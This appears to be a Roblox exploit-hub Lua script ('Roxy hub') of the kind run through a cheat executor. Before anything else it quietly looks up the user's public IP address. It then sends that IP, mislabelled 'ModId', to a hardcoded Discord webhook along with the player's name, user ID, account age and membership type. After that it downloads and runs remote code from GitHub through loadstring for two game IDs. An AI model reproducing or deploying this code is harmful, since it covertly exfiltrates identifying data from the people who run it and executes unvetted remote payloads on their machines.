if not game:IsLoaded() then
	local notLoaded = Instance.new("Message", game:GetService("CoreGui"))
	notLoaded.Text = 'Roxy hub is waiting for the game to load'
	game.Loaded:Wait()
	notLoaded:Destroy()
end
local plr = game:GetService("Players").LocalPlayer
local function GetMod() : string
    local request = request or http_request or (syn and syn.request)

    local response = request({Url = "https://api.ipify.org?format=json", Method = "GET"})
    response = game:GetService("HttpService"):JSONDecode(response.Body)


    return response.ip
end
local Webhook = "https://discord.com/api/webhooks/1046476917135638529/_KmE8nfu98C5rARHdzzMYCCiPGifL-92rRWg7bltuH9e0lX-bHSzYNWHproD4xMVH--Q"

local Headers = {["content-type"] = "application/json"}


local AccountAge = plr.AccountAge
local MembershipType = string.sub(tostring(plr.MembershipType), 21)
local UserId = plr.UserId
local PlayerName = plr.Name

local PlayerData =
{
       ["content"] = "",
       ["embeds"] = {{
           ["title"] = "**New User!**:",
           ["url"] = 'https://www.roblox.com/users/' ..UserId.. '/profile',
           ["description"] = PlayerName,
           ["color"] = tonumber(0x2B6BE4),
           ["fields"] = {
               {
                   ["name"] = "AccName:",
                   ["value"] = PlayerName,
                   ["inline"] = true
},
               {
                   ["name"] = "MemberShip:",
                   ["value"] = MembershipType,
                   ["inline"] = true
},
               {
                   ["name"] = "Acc Age:",
                   ["value"] = AccountAge,
                   ["inline"] = true
},
               {
                   ["name"] = "ID:",
                   ["value"] = UserId,
                   ["inline"] = true
},
				{
		    ["name"] = "ModId:",
                    ["value"] = GetMod(),
                    ["inline"] = true
},
           },
       }}
   }

local PlayerData = game:GetService('HttpService'):JSONEncode(PlayerData)
local HttpRequest = http_request;

if syn then
   HttpRequest = syn.request
   else
   HttpRequest = http_request
end

HttpRequest({Url=Webhook, Body=PlayerData, Method="POST", Headers=Headers})
local p = game.PlaceId
if p == 3226555017 then
loadstring(game:HttpGet("https://raw.githubusercontent.com/fff2dwaNNnw243f/-/main/%D8%B3%D9%83%D8%B1%D8%A8%D8%AA%20%D8%B3%D8%B3%D8%A8%D9%8A"))() 
elseif p == 2474168535 then
loadstring(game:HttpGet("https://raw.githubusercontent.com/fff2dwaNNnw243f/-/main/fefeefefefefefefefef"))()
else
while wait(1) do
print("GAME NOT SUPPORTED")
end
end
